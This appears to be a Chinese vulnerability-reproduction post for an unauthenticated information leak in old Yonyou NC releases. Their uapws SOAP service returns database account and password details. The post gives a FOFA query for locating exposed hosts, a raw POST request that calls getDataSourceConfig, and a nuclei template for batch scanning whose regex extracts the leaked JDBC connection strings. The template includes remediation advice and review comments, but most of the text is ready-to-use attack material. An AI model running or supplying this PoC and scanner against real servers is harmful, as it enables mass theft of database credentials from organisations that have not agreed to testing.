用友NC 老版本的 uapws 接口存在数据库账号密码泄露漏洞:下文请求不带任何凭据,调用 getDataSourceConfig 即可返回数据源配置。
漏洞复现
fofa语法:app="用友-UFIDA-NC"
POC:
POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<por:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>
nuclei批量yaml文件
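# Detection template: flags Yonyou NC hosts whose uapws SOAP service answers
# getDataSourceConfig with the data source configuration.
# Extracted values are database connection strings, so treat scan output as
# sensitive and rotate the affected database credentials on confirmed findings.
id: yonyou_NC-uapws-database-read

info:
  name: yonyou_NC-uapws-database-read
  author: nigori
  severity: high
  description: >-
    Older Yonyou NC releases expose the uapws SOAP service
    PortalSESInitToolService to requests that carry no credentials. Its
    getDataSourceConfig operation returns the data source configuration,
    disclosing the database account and password.
  remediation: >-
    Upgrade NC to a release in which this service is no longer reachable
    without authentication, restrict network access to /uapws/ to trusted
    management hosts, and rotate any database credentials the endpoint
    returned.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    # Sensitive information exposure. The original CWE-22 (path traversal)
    # does not describe this issue: no file path is involved in the request.
    cwe-id: CWE-200
  metadata:
    # Asset-discovery query, moved out of the description field.
    fofa-query: 'app="用友-UFIDA-NC"'
  tags: yonyou,nc,oa,bjxsec

requests:
  - raw:
      # The blank line separating headers from the SOAP body is required;
      # without it the envelope lines are parsed as malformed headers.
      # NOTE(review): Content-Type is kept as published; SOAP 1.1 normally
      # uses text/xml - confirm which one the service expects.
      - |
        POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
        <soapenv:Header/>
        <soapenv:Body>
        <por:getDataSourceConfig/>
        </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      # Require the JDBC URL scheme prefix rather than the bare word "jdbc",
      # which also appears in unrelated error pages and documentation.
      # NOTE(review): still a weak signal on its own; add a response-specific
      # marker once a real response has been captured.
      - type: word
        part: body
        words:
          - "jdbc:"
        condition: and
      - type: status
        status:
          - 200

    extractors:
      # Captures URLs shaped like jdbc:...:<port>:<name>. Other JDBC URL
      # shapes still satisfy the matchers but produce no extracted value.
      - type: regex
        part: body
        group: 1
        regex:
          - '(jdbc:.+\:\d{1,5}\:\w+)'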